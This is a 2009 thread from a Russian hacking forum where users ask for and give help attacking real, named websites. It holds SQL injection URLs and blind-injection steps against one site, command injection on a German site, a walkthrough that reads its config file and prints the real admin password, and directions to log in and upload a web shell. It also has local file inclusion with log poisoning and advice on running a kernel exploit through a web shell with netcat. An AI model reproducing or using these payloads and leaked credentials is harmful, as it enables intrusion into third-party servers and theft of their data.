Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605
    http://forum.antichat.ru/threadnav46016-782-10.html

    :confused: :confused: :confused: так ни кто и не ответит да??
     
    _________________________
  2. DimOnOID

    DimOnOID Banned

    Joined:
    5 Dec 2006
    Messages:
    407
    Likes Received:
    126
    Reputations:
    4
    В чём проблема использовать уже готовый сплойт? зачем тебе эта прога? ты вручную собрался перебирать?
     
  3. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605
    смысл не в сплоите а в том почему у меня так же не получается произвести SQL

    и главный смысл мне понять как в коде найти SQL (явный код я знаю как там найти а тут не догодался бы) вот и пытался сделать так же ..НО борода

    P.S. про сплоит речи не было
     
    _________________________
    #7823 HAXTA4OK, 1 Jul 2009
    Last edited: 1 Jul 2009
  4. L I G A

    L I G A Banned

    Joined:
    27 Jul 2008
    Messages:
    482
    Likes Received:
    380
    Reputations:
    49
    >>код я знаю как там найти
    сотсавь регулярку и парсь.
     
  5. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Баг будет работать при register_globals=ON

    Ну и разумеется если версию не пропатчили. Тот кусок кода который привёл ты не даёт полной картины. Фильтры там стоят вообще в другом файле, самого запроса у тебя тоже нет. Какого совета ты хочешь?
    Перичитай статью Электа, посмотри ещё раз видио, если ты имея на руках сорцы не видишь по коду есть скуль или нет, то наверное нужно браться за то что попроще, а не задавать вопросы на которые нет ответов.

    Это из серии "я подставил кавычку и у меня ошибка, как мне взломать сайт".
     
  6. softrix

    softrix New Member

    Joined:
    5 Jul 2008
    Messages:
    16
    Likes Received:
    2
    Reputations:
    -1
    Народ вот нашел уязвимость,
    http://www.rukso.ru/news/own/999190'+and+1=2+union+select+1,1,1,4,5,6,1+from+_members+--+

    Но не могу подобрать колонки, можно отсюда чтонить выжать?

    http://www.rukso.ru/admin/ - админка соответственно
     
  7. Ded MustD!e

    Ded MustD!e Banned

    Joined:
    23 Aug 2007
    Messages:
    392
    Likes Received:
    694
    Reputations:
    405
    Table 'rukso._members' doesn't exist

    Ты бы сначала таблицу правильно подобрал...
     
  8. softrix

    softrix New Member

    Joined:
    5 Jul 2008
    Messages:
    16
    Likes Received:
    2
    Reputations:
    -1
    Так я и грю, что таблицы не подобрать! а _members оставил чтобы инъект было видно!

    information_schema не доступна. Просто может кто этот CMS Знает и таблицу юзеров подскажет?
    Или какой другой вариант пробывать?
     
  9. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Code:
    http://www.rukso.ru/news/own/999190+or+1=0 - шаг 1
    
    http://www.rukso.ru/news/own/999190+or+1=1 - шаг 2
    
    http://www.rukso.ru/news/own/999190+or+1=1+and+substring(version(),1,1)=4 - шаг 3
    
    Дальше хз, вроде слепая просто

    Дык 4-ая ветка, её там и нет, только брут, по определению
     
    #7829 Pashkela, 1 Jul 2009
    Last edited: 1 Jul 2009
  10. nub-hacker

    nub-hacker Banned

    Joined:
    23 Jun 2009
    Messages:
    69
    Likes Received:
    5
    Reputations:
    -10
    1.Здрасте. Короче вот http://www.insolvenzrechtstag.de/cgi-bin-local/masterpfp.cgi?doc=|ls|

    это выполнение команд на серве. я узнал что на серве есть PHP.
    У меня есть шелл на народе.

    Помогите залить шелл через выплнение команд. т.е. надо создать файл с расш. пхп и запусить? помогите плиз.

    и подскажите дерикторию плиз в которой сайт лежит

    ЗЫ деф. не буду. чесн слово.


    2. Помогите заюзать InetCrack чтобы в данном логе осталась моя запись например PRIVET?

    http://www.lohuis.ro/index.php?page=../../../../../../../../../../var/log/apache/error_log%00
     
    #7830 nub-hacker, 1 Jul 2009
    Last edited: 2 Jul 2009
  11. Ch3ck

    Ch3ck Elder - Старейшина

    Joined:
    9 Jun 2006
    Messages:
    1,363
    Likes Received:
    1,190
    Reputations:
    430
    Тэк.... Вообщем идём сюда :http://www.insolvenzrechtstag.de/cgi-bin-local/masterpfp.cgi?doc=|cat%20../htdocs/admin/config.inc.php| там подглядываем такое:
    Code:
     $login["server"]="localhost";
    	$login["user"]=$DBUser;
    	$login["password"]=$DBPass;
    	$login["database"]="insotag";
    
    	$ftpuser=$login["user"];
    	$ftppass=$login["password"];
    	
    	$ftpserver="www.insolvenzrechtstag.de";
    	$ftppfad="www/htdocs/pdfdoc";
    	
    	$webpfad="../pdfdoc";
    	
    	$adminuser="insotag";
    	$adminpass="hoersaal";
    
    	$admintemplate="../Templates/administration.dwt";
    	$erfassentemplate="../Templates/erfassen.dwt";
    	$bearbeitentemplate="../Templates/bearbeiten.dwt";
    	$loeschentemplate="../Templates/loeschen.dwt";
    
    Отсюда видно, что $adminuser="insotag";
    $adminpass="hoersaal";

    Потом идём сюда: http://www.insolvenzrechtstag.de/admin/ вводим логин и пароль, проходим в http://www.insolvenzrechtstag.de/admin/index.php?modus=erfassen и заливаем шелл... так как я в немецком нини то... :)
     
    #7831 Ch3ck, 2 Jul 2009
    Last edited: 2 Jul 2009
    1 person likes this.
  12. SeTM

    SeTM Member

    Joined:
    11 Jun 2008
    Messages:
    11
    Likes Received:
    6
    Reputations:
    0
    Можно ли что-то сделать с этим запросом в скрипте
    PHP:
    $row mysql_query("INSERT INTO table (id,text) VALUES ('$id', '$text')");?
    Допустим вставить свои данные в другую таблицу?
    Переменные id и text никак не фильтруются, на сервере включены magic quotes, mysql 5.
     
  13. geezer.code

    geezer.code Elder - Старейшина

    Joined:
    22 Jan 2007
    Messages:
    552
    Likes Received:
    358
    Reputations:
    90
    при включенных magic_quotes нельзя.
     
  14. nub-hacker

    nub-hacker Banned

    Joined:
    23 Jun 2009
    Messages:
    69
    Likes Received:
    5
    Reputations:
    -10
    Подскажите плиз. имеется WEB Shell на серваке. называется WSO2.
    На милворе нашол сплоит на C под этот сервак. Как через вебшелл запустить этот сплоит?
    http://milw0rm.com/search.php?dong=Linux+Kernel+2.6.29

    add
    // резервисты пришли, посмотрели и ушли :D :D :D
     
    #7834 nub-hacker, 2 Jul 2009
    Last edited: 2 Jul 2009
  15. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    nub-hacker
    На форуме куча статей, по запуску сплоитов в том числе.

    Будешь продолжать ничего не читая задавать вопросы и переносить сюда тему PHP инъекций с просьбой залить шелл , этот мультиакк тоже уйдёт в бан.

    Мне даже в модцп не нужно лезть, что-бы понять кто ты.
     
  16. nemaniak

    nemaniak Elder - Старейшина

    Joined:
    10 Jun 2008
    Messages:
    195
    Likes Received:
    161
    Reputations:
    108
    Для начала надо забиндить порт, в wso это если не ошибаюсь в разделе network. А затем приконектишься с помощью netcat и откомпилишь командой gcc предварительно сохраненный на серваке сплойт. Например так, gcc sploit.c. Далее запускаешь сплойт ./sploit.c.
     
  17. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    Народ,чем к бд приконнектиться ещё можно ?

    SQL Manager:
    Can't connect
    Client does not support authentication protocol requested by server; consider upgrading MySQL client

    Выдаёт мой любимый с99 модификэйтед )))).
     
  18. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Постом выше, WSO, автор шелла тусит тут, так что в случае чего и вопросы будет кому задавать
     
    1 person likes this.
  19. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    Люди,чем объяснить то,что у одних клиентов одного и того же хостера работает компиль.а у других не то,что не работает,а даже не установлен ?
     
  20. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Разные тарифные планы, соответственно разные возможности у каждоно клиента, так было всегда и так будет абсолютно у любого хостера
     
Thread Status:
Not open for further replies.